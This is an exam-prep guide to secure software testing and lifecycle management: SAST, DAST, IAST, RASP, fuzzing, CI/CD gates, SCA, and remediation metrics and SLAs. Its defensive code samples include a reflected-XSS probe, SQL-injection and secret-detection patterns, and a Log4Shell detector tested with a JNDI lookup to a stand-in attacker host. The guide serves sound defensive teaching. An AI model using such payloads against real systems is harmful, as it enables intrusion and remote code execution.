SAST · DAST · IAST · RASP · Fuzzing · Pen Testing · DevSecOps · Shift Left · Metrics
Domains 5 (Secure Software Testing) and 6 (Secure Software Lifecycle Management) together account for approximately 25% of the CSSLP exam. This topic covers how and when to test, how to integrate security into every phase, and how to measure progress.
| # | Domain | Approx. Weight |
|---|---|---|
| 1 | Secure Software Concepts | ~10% |
| 2 | Secure Software Requirements | ~14% |
| 3 | Secure Software Architecture & Design | ~14% |
| 4 | Secure Software Implementation | ~14% |
| 5 | Secure Software Testing | ~14% |
| 6 | Secure Software Lifecycle Management | ~11% |
| 7 | Secure Software Supply Chain | ~13% |
| 8 | Secure Software Deployment, Operations & Maintenance | ~10% |
**SAST (Static Application Security Testing):** Source code or bytecode analysis without executing the application. Runs in the CI pipeline during the coding phase. Finds injection flaws, hardcoded secrets, and insecure API usage early and cheaply.
**DAST (Dynamic Application Security Testing):** Tests a running application from the outside (black box). Used in the staging/testing phase. Finds XSS, SQLi, authentication issues, and misconfigurations that only manifest at runtime.
**IAST (Interactive Application Security Testing):** Instrumented agents sit inside the running application during test execution, combining the advantages of SAST and DAST. Produces very few false positives and pinpoints the exact code location of findings.
**RASP (Runtime Application Self-Protection):** NOT a test tool, but production runtime protection. Embedded agents intercept DB queries, file operations, and network calls, detecting and blocking attacks in real time; they can terminate sessions or raise alerts.
**Fuzzing:** Automated submission of malformed or random input to find crashes and memory corruption. Coverage-guided fuzzing (AFL, libFuzzer) tracks code paths and is the most efficient variant. Finds buffer overflows, parser bugs, and DoS conditions.
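The core loop can be sketched in a few lines of Python: a deliberately fragile length-prefixed parser (hypothetical, for illustration) and a random mutation fuzzer that records inputs triggering unexpected exceptions. Coverage guidance, the key feature of AFL and libFuzzer, is omitted for brevity.

```python
import random

def fragile_parse(data: bytes) -> int:
    """Toy parser with a deliberate bug: it trusts the length
    prefix in byte 0 even when the buffer is shorter."""
    if len(data) < 2:
        raise ValueError("too short")          # expected, handled error
    length = data[0]
    payload = data[1:1 + length]
    if len(payload) != length:
        raise IndexError("length prefix exceeds buffer")  # the "crash"
    return sum(payload)

def fuzz(target, seed: bytes, rounds: int = 2000):
    """Mutate the seed with random byte flips; collect inputs that
    raise anything other than the parser's documented error."""
    rng = random.Random(1234)                  # fixed seed: reproducible run
    crashes = []
    for _ in range(rounds):
        data = bytearray(seed)
        for _ in range(rng.randint(1, 4)):
            data[rng.randrange(len(data))] = rng.randrange(256)
        try:
            target(bytes(data))
        except ValueError:
            pass                               # well-handled, not a finding
        except Exception as exc:               # unexpected: record as a crash
            crashes.append((bytes(data), type(exc).__name__))
    return crashes

crashes = fuzz(fragile_parse, b"\x03abc")
```

Random mutation alone finds this bug quickly because the fault is shallow; coverage guidance earns its keep on deeply nested parsing logic.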
**Shift Left (DevSecOps):** Integrating security into every SDLC phase rather than bolting it on at the end, enforced through security gates in CI/CD pipelines. A fix at the requirements phase costs roughly 1× versus up to 100× in production.
Understanding each technique's timing, strengths, and limitations is essential for the CSSLP exam. Questions often test which method to apply in a given scenario.
**SAST in depth:** Analyzes source code, bytecode, or binaries without executing the application. Builds abstract syntax trees (ASTs) and data-flow graphs to detect vulnerability patterns.
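As a rough illustration of the AST approach, here is a minimal rule using Python's standard `ast` module to flag string literals assigned to secret-sounding variable names. The name list and the rule itself are illustrative; real SAST engines layer data-flow and taint analysis on top of pattern matching.

```python
import ast

# Illustrative watchlist; commercial tools ship hundreds of rules.
SECRET_NAMES = {"password", "secret", "api_key", "token"}

def find_hardcoded_secrets(source: str):
    """Walk the AST and flag string constants assigned to
    suspicious variable names -- a (simplified) SAST rule."""
    findings = []
    tree = ast.parse(source)
    for node in ast.walk(tree):
        if isinstance(node, ast.Assign):
            for target in node.targets:
                if (isinstance(target, ast.Name)
                        and target.id.lower() in SECRET_NAMES
                        and isinstance(node.value, ast.Constant)
                        and isinstance(node.value.value, str)):
                    findings.append((node.lineno, target.id))
    return findings

code = 'password = "hunter2"\nretries = 3\n'
print(find_hardcoded_secrets(code))  # → [(1, 'password')]
```

Note how the finding carries an exact line number: precise source location is exactly what SAST contributes and what black-box DAST cannot.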
**DAST in depth:** Tests the running application from the outside as a black box, like an external attacker. Sends crafted HTTP requests and analyzes the responses; no source code access is required.
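One core DAST check, reflected-XSS probing, reduces to injecting a unique marker and testing whether the response echoes it back unescaped. A minimal sketch of the detection logic (the HTTP round trip is elided; a real scanner would send the payload as a request parameter and parse the live response):

```python
def check_reflection(payload: str, response_body: str) -> bool:
    """A DAST scanner injects a unique marker into a parameter and
    checks whether it comes back unescaped -- a reflected-XSS signal."""
    return payload in response_body

# The marker makes the probe identifiable in the response.
probe = '<script>alert("xss-7f3a")</script>'

# Simulated responses: one echoes the raw payload, one HTML-encodes it.
vulnerable_page = f"<html>You searched for {probe}</html>"
safe_page = "<html>You searched for &lt;script&gt;...&lt;/script&gt;</html>"
```

The encoded variant does not match, which is the desired outcome: proper output encoding defeats the probe, so the scanner reports no finding.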
**IAST in depth:** Agents are instrumented inside the running application (bytecode instrumentation) and observe execution during QA test runs, combining inside knowledge (like SAST) with real-traffic testing (like DAST).
IAST is a testing tool used in test environments; it produces reports and findings. Do not confuse it with RASP, which uses similar agent technology but runs in production to block attacks.
**RASP in depth:** Agents embedded in the running production application intercept calls (DB queries, file operations, network calls) and inspect them in real time against attack signatures.
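The interception idea can be sketched with a Python decorator standing in for the bytecode-level hooks a real RASP agent installs in the runtime. The SQLi signature regex is deliberately simplistic and purely illustrative; production agents combine signatures with context from the instrumented call site.

```python
import re

# Toy signature set: comment sequences, statement chaining, classic tautology.
SQLI_SIGNATURES = re.compile(r"(--|;|' *OR *'1' *= *'1)", re.IGNORECASE)

class AttackBlocked(Exception):
    """Raised when the guard terminates a suspicious operation."""

def rasp_guard(func):
    """Wrap a data-access call and inspect its arguments in real time,
    mimicking how a RASP agent hooks DB drivers via instrumentation."""
    def wrapper(query, *params):
        if SQLI_SIGNATURES.search(query):
            raise AttackBlocked(f"blocked suspicious query: {query!r}")
        return func(query, *params)
    return wrapper

@rasp_guard
def run_query(query, *params):
    return f"executed: {query}"        # stand-in for a real DB call

run_query("SELECT * FROM users WHERE id = ?", 42)   # parameterized: allowed
```

The key contrast with IAST: the guard does not merely report the finding, it blocks the call, which is exactly why RASP belongs in production rather than in testing.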
**Vulnerability scanning vs. penetration testing:** Vulnerability scanning identifies potential weaknesses; penetration testing actively exploits them to confirm impact. A pen test requires a Rules of Engagement (RoE) document signed before testing begins.
| Method | Access | When in SDLC | False Positives | Key Strength |
|---|---|---|---|---|
| SAST | Source code / bytecode | Coding / CI pipeline | High | Earliest feedback, shift left |
| DAST | Running app (black box) | Testing / Staging | Low | Tests real system, language-agnostic |
| IAST | Inside running app (agent) | QA Testing | Very Low | Precise code location + real traffic |
| RASP | Inside running app (agent) | Production (not testing) | N/A | Blocks attacks in real time |
| Fuzzing | App interface / API | Testing / CI | Low | Finds memory corruption, crashes |
| Pen Test | Black / Grey / White box | Pre-release / Annual | Very Low | Confirms real exploitability |
Shift Left and DevSecOps are not buzzwords — they represent a fundamental cost and quality argument. The earlier a vulnerability is found, the cheaper and faster it is to fix.
| Gate | Tools / Activities | Action on Failure |
|---|---|---|
| Pre-commit | Git hooks, secret scanning (truffleHog, git-secrets) | Block commit — never let secrets enter repo |
| Build | SAST scan (Checkmarx, SonarQube), SCA/dependency scan (Snyk, OWASP Dependency-Check) | Fail build on critical findings |
| Test | DAST against staging (ZAP, Burp), IAST during QA, security regression tests | Block promotion to pre-release |
| Pre-release | Pen test sign-off, security review, compliance check | Halt release — requires sign-off |
| Deploy | RASP agents, WAF rules, infrastructure scanning | Alert + block malicious traffic |
| Operate | Continuous vuln scanning, threat intel feeds, patch management | SLA-driven remediation tickets |
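The pre-commit gate in the table above can be approximated with a few regular expressions in the style of git-secrets. The patterns are illustrative, not exhaustive; the AWS key in the sample diff is Amazon's documented placeholder key, and the AKIA-prefix format it matches is publicly specified.

```python
import re

# Patterns modeled on what tools like truffleHog/git-secrets look for.
SECRET_PATTERNS = {
    "aws_access_key": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key":    re.compile(r"-----BEGIN (?:RSA |EC )?PRIVATE KEY-----"),
    "generic_token":  re.compile(r"(?i)(api[_-]?key|secret)\s*[:=]\s*['\"][^'\"]{12,}['\"]"),
}

def scan_diff(diff_text: str):
    """Return (pattern_name, line_no) hits; a pre-commit hook would
    exit non-zero on any hit to block the commit."""
    hits = []
    for lineno, line in enumerate(diff_text.splitlines(), 1):
        for name, pattern in SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((name, lineno))
    return hits

diff = 'db_url = "postgres://..."\naws_key = "AKIAIOSFODNN7EXAMPLE"\n'
```

Blocking at commit time matters because once a secret lands in Git history, rotation (not deletion) is the only safe remedy.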
| Phase | Security Activity | Key Artifact |
|---|---|---|
| Requirements | Define security requirements, abuse cases, privacy requirements | Security requirements document, abuse case list |
| Design | Threat modeling (STRIDE), security architecture review, attack surface analysis | Threat model (DFD + STRIDE), security design doc |
| Implementation | Secure coding standards, SAST in CI, security code review | SAST reports, peer review records |
| Testing | DAST, IAST, fuzzing, security test cases, security regression testing | DAST/IAST reports, pen test plan |
| Deployment | Pen test sign-off, RASP config, WAF rules, hardening checklist | Pen test report, go/no-go security sign-off |
| Maintenance | Patch management, vuln scanning, incident response, SCA updates | Patch compliance report, MTTD/MTTR metrics |
**SCA (Software Composition Analysis):** Scans open-source and third-party dependencies for known CVEs using databases such as NVD, OSV, and the GitHub Advisory Database. You are responsible for ALL code in your product binary, including every open-source library you pull in.
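Conceptually, SCA is a lookup of resolved (package, version) pairs against advisory data. A toy sketch with a hardcoded advisory map (real tools query live NVD/OSV feeds and resolve the full transitive dependency graph; the CVE IDs shown are the real ones for these packages):

```python
# Toy advisory database keyed by (package, version).
ADVISORIES = {
    ("log4j-core", "2.14.1"): ["CVE-2021-44228"],   # Log4Shell
    ("commons-text", "1.9"):  ["CVE-2022-42889"],   # Text4Shell
}

def audit(dependencies):
    """Match each (name, version) pair -- including transitive deps
    resolved by the build tool -- against known advisories."""
    findings = {}
    for dep in dependencies:
        if dep in ADVISORIES:
            findings[dep] = ADVISORIES[dep]
    return findings

deps = [("spring-core", "5.3.20"), ("log4j-core", "2.14.1")]
print(audit(deps))
```

Because the check is a pure lookup, it is cheap enough to run on every build, which is why SCA belongs in the build gate alongside SAST.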
**Case study: Log4Shell (CVE-2021-44228).** Critical RCE in Apache Log4j, used by millions of Java applications. Exploitable with a single crafted string in a log message. Demonstrated that transitive dependencies (libraries used by your libraries) are equally dangerous. SCA finds these automatically.
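A WAF or log-scrubbing rule for the plain Log4Shell trigger string can be sketched as follows. This checks only the unobfuscated form; real rules must also handle nested lookups such as `${${lower:j}ndi:...}` that attackers used to evade naive filters.

```python
def contains_jndi_lookup(value: str) -> bool:
    """Flag the ${jndi:...} lookup syntax that triggered Log4Shell.
    Plain-form check only -- obfuscated variants need deeper parsing."""
    return "${jndi:" in value.lower()

contains_jndi_lookup("${jndi:ldap://attacker.example/a}")   # malicious
contains_jndi_lookup("User-Agent: Mozilla/5.0")             # benign
```

Filtering is a stopgap; the durable fix is patching the vulnerable library, which is what the SCA process exists to drive.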
Security metrics prove the ROI of your program and guide prioritization. Policies provide the authority and SLAs that drive action. Know both for the CSSLP exam.
**MTTD (Mean Time to Detect):** Average time from vulnerability introduction to discovery. Lower = better monitoring. Measures how quickly your detection tooling finds issues. Report the trend over time to management.
**MTTR (Mean Time to Remediate):** Average time from vulnerability discovery to fix deployed. Lower = faster fixes. Affected by team capacity, process efficiency, and complexity. Pair with MTTD for a complete picture.
**Vulnerability Density:** Number of vulnerabilities per thousand lines of code (KLOC). Lower = better code quality. Track per release and per team to identify where investment in training/tooling is needed.
**SLA Compliance Rate:** Percentage of vulnerabilities patched within their SLA window. Target: 100% for Critical and High. Gate production deployments on compliance; SLAs without enforcement are merely suggestions.
**False Positive Rate:** Percentage of SAST/DAST findings that are not real vulnerabilities. Lower = better-tuned tools. High false positive rates cause alert fatigue and erode developer trust in scanning tools.
**Security Test Coverage:** Percentage of code covered by security tests (SAST, unit tests for security functions). Higher = better. Pair with vulnerability density: high coverage plus low density indicates a mature program.
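These metrics are simple arithmetic over vulnerability lifecycle timestamps. A sketch computing MTTD, MTTR, and density from a list of records (the field names and record shape are illustrative, not from any particular tool):

```python
from datetime import datetime

def mean_hours(spans):
    """Average a sequence of timedeltas, expressed in hours."""
    spans = list(spans)
    return sum(s.total_seconds() for s in spans) / len(spans) / 3600

def program_metrics(vulns, kloc):
    """vulns: records with introduced/discovered/fixed datetimes.
    Returns MTTD and MTTR in hours plus vulnerability density."""
    mttd = mean_hours(v["discovered"] - v["introduced"] for v in vulns)
    mttr = mean_hours(v["fixed"] - v["discovered"] for v in vulns)
    return {
        "mttd_h": mttd,
        "mttr_h": mttr,
        "density_per_kloc": len(vulns) / kloc,
    }

t0 = datetime(2024, 1, 1)
vulns = [
    {"introduced": t0, "discovered": datetime(2024, 1, 3),
     "fixed": datetime(2024, 1, 4)},   # found after 2 days, fixed in 1
    {"introduced": t0, "discovered": datetime(2024, 1, 5),
     "fixed": datetime(2024, 1, 6)},   # found after 4 days, fixed in 1
]
m = program_metrics(vulns, kloc=50)    # 50 KLOC codebase
```

With these two records, MTTD is 72 hours and MTTR is 24 hours: detection, not remediation, is the bottleneck, which is the kind of prioritization signal the metrics exist to provide.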
| Severity | CVSS Range | Remediation SLA | Key Action |
|---|---|---|---|
| Critical | 9.0 – 10.0 | 24–48 hours | Emergency patch, escalate immediately |
| High | 7.0 – 8.9 | 7 days | Priority fix in current or next sprint |
| Medium | 4.0 – 6.9 | 30 days | Scheduled fix with compensating controls |
| Low | 0.1 – 3.9 | 90 days | Backlog item, fix in regular maintenance |
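The severity bands map directly to code; a small helper mirroring the table (the band boundaries are CVSS v3 qualitative ratings, while the SLA windows are the illustrative policy values from the table, not anything CVSS mandates):

```python
def remediation_sla(cvss: float):
    """Map a CVSS v3 base score to (severity, SLA window)."""
    if cvss >= 9.0:
        return ("Critical", "24-48 hours")
    if cvss >= 7.0:
        return ("High", "7 days")
    if cvss >= 4.0:
        return ("Medium", "30 days")
    if cvss > 0.0:
        return ("Low", "90 days")
    return ("None", "no action")        # CVSS 0.0 carries no severity

remediation_sla(9.8)   # → ("Critical", "24-48 hours")
```

Encoding the policy as code is what makes it enforceable: the same function can gate a CI pipeline or auto-assign SLA due dates on remediation tickets.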
**Acceptable Use Policy (AUP):** Defines permitted and prohibited use of organizational systems, data, and networks. Covers social engineering awareness, data handling, and personal use limits.
**Secure Development Policy:** Mandates security practices in the SDLC: code review requirements (4-eyes), SAST integration in CI, pen test before release, secure coding standards compliance (OWASP Top 10, SANS Top 25).
**Vulnerability Management Policy:** Defines patching SLAs by severity, scanning cadence, exception process, and escalation paths. The authoritative document that makes CVSS-based SLAs binding rather than just guidelines.
**Incident Response Plan:** Defines roles, responsibilities, escalation paths, and communication procedures for security incidents. Requires regular tabletop exercises and post-incident reviews.
**Change Management Policy:** 4-eyes principle for production changes, Change Advisory Board (CAB) approval for high-risk changes, rollback requirements, and emergency change procedures. Prevents unauthorized modifications.
| Training Type | Content | Audience |
|---|---|---|
| Awareness | Phishing recognition, social engineering, data classification, data handling | All employees |
| Secure Coding | OWASP Top 10, SANS Top 25, language-specific risks, secure design patterns | All developers |
| Security Champions | Advanced threat modeling, SAST/DAST tool usage, security review techniques | Selected developers per team |
| Bug Bounty | Encourages responsible disclosure from external researchers — provides ongoing real-world testing | External researchers |